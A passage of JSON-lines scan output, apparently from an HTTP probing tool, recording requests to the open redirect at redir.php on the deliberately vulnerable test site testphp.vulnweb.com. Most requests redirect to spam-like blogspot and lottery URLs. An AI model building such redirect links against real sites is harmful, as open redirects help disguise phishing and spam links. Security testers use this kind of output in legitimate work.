se\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:35.38844808Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://gnewsani.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://gnewsani.blogspot.com/\",\"location\":\"http://gnewsani.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://gnewsani.blogspot.com/\",\"time\":\"352.673053ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:35.749530903Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://gopokerwg0jg.blogspeak.net/football-new-for-ideas-2022/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://gopokerwg0jg.blogspeak.net/football-new-for-ideas-2022/\",\"location\":\"http://gopokerwg0jg.blogspeak.net/football-new-for-ideas-2022/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://gopokerwg0jg.blogspeak.net/football-new-for-ideas-2022/\",\"time\":\"342.892011ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:36.162899894Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://guestnewspro.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://guestnewspro.blogspot.com/\",\"location\":\"http://guestnewspro.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://guestnewspro.blogspot.com/\",\"time\":\"351.883406ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:36.199668632Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://guestpostforme.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://guestpostforme.blogspot.com/\",\"location\":\"http://guestpostforme.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://guestpostforme.blogspot.com/\",\"time\":\"357.014384ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:36.385058449Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://haangkia.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://haangkia.blogspot.com/\",\"location\":\"http://haangkia.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://haangkia.blogspot.com/\",\"time\":\"348.206904ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:36.928186549Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://hamyareweb.co/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://hamyareweb.co/\",\"location\":\"http://hamyareweb.co/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://hamyareweb.co/\",\"time\":\"351.201982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:36.970942891Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://hejhrhenh.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://hejhrhenh.blogspot.com/\",\"location\":\"http://hejhrhenh.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://hejhrhenh.blogspot.com/\",\"time\":\"343.587008ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:38.640570542Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://hejhrhenh.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://hejhrhenh.blogspot.com/management.html\",\"location\":\"http://hejhrhenh.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://hejhrhenh.blogspot.com/management.html\",\"time\":\"348.706582ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:39.940886897Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://highdemandingblog.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://highdemandingblog.blogspot.com/\",\"location\":\"http://highdemandingblog.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://highdemandingblog.blogspot.com/\",\"time\":\"344.085379ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:39.994464339Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://highdemandingblog.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://highdemandingblog.blogspot.com/management.html\",\"location\":\"http://highdemandingblog.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://highdemandingblog.blogspot.com/management.html\",\"time\":\"339.326402ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:40.33288742Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://highguestnews.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://highguestnews.blogspot.com/\",\"location\":\"http://highguestnews.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://highguestnews.blogspot.com/\",\"time\":\"352.539566ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.184025922Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://hongmen.com.vn/san-pham/cua-cong-xep-tu-dong/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://hongmen.com.vn/san-pham/cua-cong-xep-tu-dong/\",\"location\":\"http://hongmen.com.vn/san-pham/cua-cong-xep-tu-dong/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://hongmen.com.vn/san-pham/cua-cong-xep-tu-dong/\",\"time\":\"343.291955ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.215478659Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-01-2565%0A/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-01-2565%0A/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-01-2565%0A/\",\"time\":\"356.121749ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.259737135Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-02-2565%0A/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-02-2565%0A/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-02-2565%0A/\",\"time\":\"347.298441ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.26216441Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-01-2566%0A/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-01-2566%0A/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-17-01-2566%0A/\",\"time\":\"351.679447ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.554068085Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-30-12-2565%0A/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-30-12-2565%0A/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://horalotto.com/%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2-30-12-2565%0A/\",\"time\":\"348.824406ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.615481542Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://alraziuni.edu.ye//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://alraziuni.edu.ye//\",\"location\":\"http://https://alraziuni.edu.ye//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://alraziuni.edu.ye//\",\"time\":\"351.957273ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.628311989Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1552.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1552.blogspot.com//\",\"location\":\"http://https://seonews1552.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1552.blogspot.com//\",\"time\":\"338.0198ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.70799821Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1553.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1553.blogspot.com//\",\"location\":\"http://https://seonews1553.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1553.blogspot.com//\",\"time\":\"346.642102ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.740276888Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1558.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1558.blogspot.com//\",\"location\":\"http://https://seonews1558.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1558.blogspot.com//\",\"time\":\"348.481053ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.837442597Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1565.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1565.blogspot.com//\",\"location\":\"http://https://seonews1565.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1565.blogspot.com//\",\"time\":\"340.1809ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.89230481Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1570.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1570.blogspot.com//\",\"location\":\"http://https://seonews1570.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1570.blogspot.com//\",\"time\":\"343.426971ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:41.965241616Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1571.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1571.blogspot.com//\",\"location\":\"http://https://seonews1571.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1571.blogspot.com//\",\"time\":\"356.598517ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:42.001518963Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1572.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1572.blogspot.com//\",\"location\":\"http://https://seonews1572.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1572.blogspot.com//\",\"time\":\"351.057423ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:42.080505091Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1578.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1578.blogspot.com//\",\"location\":\"http://https://seonews1578.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1578.blogspot.com//\",\"time\":\"352.249892ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:42.151892945Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1585.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1585.blogspot.com//\",\"location\":\"http://https://seonews1585.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1585.blogspot.com//\",\"time\":\"343.182102ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:42.246599231Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1588.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1588.blogspot.com//\",\"location\":\"http://https://seonews1588.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1588.blogspot.com//\",\"time\":\"338.828847ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:45.434424939Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1599.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1599.blogspot.com//\",\"location\":\"http://https://seonews1599.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1599.blogspot.com//\",\"time\":\"340.299957ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:45.628744189Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1616.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1616.blogspot.com//\",\"location\":\"http://https://seonews1616.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1616.blogspot.com//\",\"time\":\"355.963594ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:45.679780547Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1618.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1618.blogspot.com//\",\"location\":\"http://https://seonews1618.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1618.blogspot.com//\",\"time\":\"347.350196ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:45.738686708Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1622.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1622.blogspot.com//\",\"location\":\"http://https://seonews1622.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1622.blogspot.com//\",\"time\":\"348.115733ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:46.099817586Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1627.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1627.blogspot.com//\",\"location\":\"http://https://seonews1627.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1627.blogspot.com//\",\"time\":\"347.914319ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:46.51388771Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1628.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1628.blogspot.com//\",\"location\":\"http://https://seonews1628.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1628.blogspot.com//\",\"time\":\"348.913992ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:46.550243849Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1630.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1630.blogspot.com//\",\"location\":\"http://https://seonews1630.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1630.blogspot.com//\",\"time\":\"348.59945ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:46.73933697Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1635.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1635.blogspot.com//\